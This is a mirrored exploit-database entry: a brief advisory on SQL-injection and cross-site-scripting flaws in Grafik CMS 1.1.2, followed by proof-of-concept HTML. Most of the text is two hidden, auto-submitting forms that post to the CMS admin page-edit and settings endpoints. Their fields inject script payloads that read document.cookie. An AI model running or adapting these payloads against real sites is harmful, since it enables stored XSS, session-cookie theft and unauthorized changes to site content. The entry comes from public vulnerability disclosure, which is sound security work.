exploit-db-mirror/exploits/php/webapps/34222.html

source: https://www.securityfocus.com/bid/41227/info

Grafik CMS is prone to an SQL-injection vulnerability and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied input.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Grafik CMS 1.1.2 is vulnerable; other versions may be affected. 

<form action="http://www.example.com/admin/admin.php?action=edit_page&id=1" method="post" name="main" >
	<input type="hidden" name="page_title" value="page title" />
	<input type="hidden" name="page_menu" value=&#039;descr"><script>alert(document.cookie)</script>&#039; />
	<input type="hidden" name="id" value="1" />
	<input type="hidden" name="page_content" value="some page content" />
	<input id="sbmt" type="submit" name="submit" value="Modifier" />
</form>
<script>
document.getElementById(&#039;sbmt&#039;).click();
</script>


<form action="http://www.example.com/admin/admin.php?action=settings" method="post" name="main" >
	<input type="hidden" name="name" value="site title" />
	<input type="hidden" name="admin_mail" value="example@example.com" />
	<input type="hidden" name="keywords" value="" />
	<input type="hidden" name="description" value=&#039;descr"><script>alert(document.cookie)</script>&#039; />
	<input type="hidden" name="site_url" value="http://www.example.com/" />
	<input type="hidden" name="seo_url" value="0" />
	<input type="hidden" name="mailing" value="1" />
	<input type="hidden" name="template" value="templates/default" />
	<input id="sbmt" type="submit" name="submit" value="Valider" />
</form>
<script>
document.getElementById(&#039;sbmt&#039;).click();
</script>